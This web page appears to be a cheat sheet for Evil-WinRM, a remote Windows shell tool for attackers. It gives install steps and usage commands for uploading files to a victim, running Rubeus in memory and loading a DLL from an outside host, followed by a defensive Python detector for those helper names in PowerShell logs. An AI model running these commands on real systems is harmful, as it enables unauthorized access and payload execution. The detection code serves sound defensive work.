
evil-winrm

Evil-WinRM is a tool that provides a command-line interface for Windows Remote Management (WinRM), a service that allows administrators to execute commands remotely on a Windows machine.

Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands.

Some features include:

  • Loading PowerShell scripts in memory

  • Loading DLL files in memory, bypassing some AVs

  • Loading x64 payloads

  • Pass-the-hash support

  • Uploading and downloading local and remote files

Install: (Git)

sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

Install: (Ruby gem)

gem install evil-winrm

Alternative installation instructions can be found here.

Usage:

# Connect to 192.168.1.100 as Administrator, with local folders for PowerShell scripts (-s) and executables (-e)
evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute a .NET assembly in victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll
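
For defenders, the helper names shown above (Invoke-Binary, Dll-Loader) are useful detection strings. The following is an added example, not part of the original page or the Evil-WinRM project: it scans PowerShell script block logging events (ID 4104) for those names and first reassembles blocks that the log split across several events. The records are constructed samples, and it assumes script block logging is enabled and that the helper text appears in the logged script.

```python
import re
from collections import defaultdict

# Helper names taken from the usage section of this page.
HELPERS = re.compile(r"\b(Invoke-Binary|Dll-Loader)\b", re.IGNORECASE)

def ev(host, block_id, number, total, text, event_id=4104):
    """Build one constructed record using the field names of event 4104."""
    return {"EventID": event_id, "Computer": host, "ScriptBlockId": block_id,
            "MessageNumber": number, "MessageTotal": total, "ScriptBlockText": text}

# Constructed sample records; the script text is illustrative, not tool source.
SAMPLE = [
    ev("ws01", "a1", 2, 2, "oader { param($http) }"),  # fragments out of order
    ev("ws01", "a1", 1, 2, "function Dll-L"),           # name split across fragments
    ev("ws01", "b2", 1, 1, "Get-ChildItem C:\\Users"),
    ev("srv02", "c3", 1, 1, "Invoke-Binary /opt/csharp/Rubeus.exe"),
    ev("srv02", "d4", 1, 1, "Invoke-Binary x", event_id=4103),  # not 4104, ignored
]

def reassemble(events):
    """Join 4104 fragments sharing a ScriptBlockId, ordered by MessageNumber."""
    blocks = defaultdict(list)
    for e in events:
        if e.get("EventID") == 4104:
            blocks[(e["Computer"], e["ScriptBlockId"])].append(e)
    for (host, block_id), parts in blocks.items():
        parts.sort(key=lambda p: p["MessageNumber"])
        complete = len(parts) == parts[0]["MessageTotal"]
        yield host, block_id, "".join(p["ScriptBlockText"] for p in parts), complete

def find_helper_use(events):
    """Return one finding per script block that mentions a helper name."""
    findings = []
    for host, block_id, text, complete in reassemble(events):
        names = sorted({m.group(1).lower() for m in HELPERS.finditer(text)})
        if names:
            findings.append({"host": host, "block": block_id,
                             "helpers": names, "complete": complete})
    return sorted(findings, key=lambda f: (f["host"], f["block"]))

if __name__ == "__main__":
    for finding in find_helper_use(SAMPLE):
        print(finding)
```

A finding with `complete` set to false means some fragments of that script block were missing from the input, so the match list for it may be partial.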

© 2035 by Train of Thoughts. Powered and secured by Thiru